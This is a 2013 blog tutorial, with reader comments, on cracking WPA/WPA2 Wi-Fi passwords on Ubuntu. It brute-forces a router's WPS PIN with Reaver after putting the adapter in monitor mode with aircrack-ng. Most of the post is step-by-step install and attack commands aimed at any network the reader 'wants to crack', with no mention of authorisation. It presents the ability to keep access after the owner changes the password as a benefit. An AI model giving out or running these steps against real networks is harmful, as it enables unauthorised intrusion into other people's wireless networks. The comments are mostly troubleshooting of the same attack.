Sunday, September 15, 2013

How to Crack WPA/WPA2 Pasword using Reaver (Ubuntu)






How to hack WPA/WPA2 Password using Reaver (Ubuntu)

In this hacking tutorial we are going to use a new vulnerability in WPA and WPA 2 (PSK/TKIP)Wireless passwords, this weak point is to attack WPS; Which is Wireless Protected Setup : this type of setup is built in 90% of routers to allow easy establishment of secure home wireless by the user, though it has been shown to fall to BruteForce Attacks. This BruteForce attack will try all combinations of Router's PIN number (Provided by WPS) and access the router to reveal the password. This type of hack have many benefits such as: You can always have the Wireless Password even if It's changed by knowing the PIN number.


1) Setting up Reaver 1.4:

Open Terminal and type (sudo -s) it will ask for your password type your password and press enter.

Now Download this package  from here

Now place this downloaded package into Home folder and open a terminal and type:
tar xvfz reaver-1.4.tar.gz
Install dependencies:
sudo apt-get install libpcap-dev
 Then
 sudo apt-get install libsqlite3-dev
Note: May be these dependencies (libcap and libsqlite3) are included in your Ubuntu version but these are very important.

Now type:
cd reaver-1.4/src

Type:
./configure
Type:
make
Type:
make install
To test if Reaver have been successfully installed, Open a Terminal and Type 'reaver' and hit enter, it should list all Reaver's sub commands.

After installing Reaver 1.4 its time to proceed the main part which is hacking a wifi network uses wpa/wpa2 encryption.

Requirements:
1): Aircrack-ng (Install it if you have not installed in your system. See the post for installation here)
2): Reaver (Installed in first step)

Now we have to start cracking the WPA/WPA2 network key.

1) Open a terminal and type:
airmon-ng start wlan0
Remove "wlan0" with your wireless adapter.

2) Type:
airodump-ng mon0
It will list all the available network stop it by pressing CTRL+C and copy the bssid of the network which you want to crack.For example I want crack the bssid: 00:11:22:33:44:55

Now start attaking. Type:
reaver -b 00:11:22:33:44:55 -i mon0 
Now it will start testing bruteforcing the PIN number of the vulnerability WPS and it will show you the WPA/WPA2 Password in the end of the Crack.

Share

& Comment

18 comments:

  1. WARNING: Failed to associate with 00:13:10:99:A9:DF (ESSID: linksys)

    ReplyDelete
    Replies
    1. Which version of ubuntu you are using bro

      Delete
    2. same problem with me.....using ubuntu 14.04

      Delete
    3. This comment has been removed by the author.

      Delete
    4. same problem here..using ubuntu 14.04 too

      Delete
  2. This comment has been removed by the author.

    ReplyDelete
  3. i found a solution for it

    http://techsolutionsite.blogspot.com/2016/03/solution-for-warning-failed-to.html




    Visit for fix this

    ReplyDelete
  4. Interface mon0:
    ioctl(SIOCGIFINDEX) failed: No such device

    what to do??

    ReplyDelete
  5. i am having this error,help me sole it


    root@server-Aspire-4739Z:~# airodump-ng mon0
    Interface mon0:
    ioctl(SIOCGIFINDEX) failed: No such device

    ReplyDelete
    Replies
    1. Same issue bro!!! Did you get any solution???

      Delete
  6. airodump-ng mon0
    socket(PF_PACKET) failed: Operation not permitted
    This program requires root privileges.
    . How to Fix this error? please tell me

    ReplyDelete
  7. Copy to your termnl

    wget http://download.aircrack-ng.org/aircrack-ng-0.9.3.tar.gz
    tar -zxvf aircrack-ng-0.9.3.tar.gz
    cd aircrack-ng-0.9.3
    make
    make install

    ReplyDelete
  8. Bro how to check for wireless adapter

    ReplyDelete
  9. associated with that bssid .... how can i get that wps key ?

    ReplyDelete

 

Copyright © KHATTAK SOFTWARE ZONE™ is a registered trademark.

Designed By: Khattak Software Zone Hosted on Blogger Platform.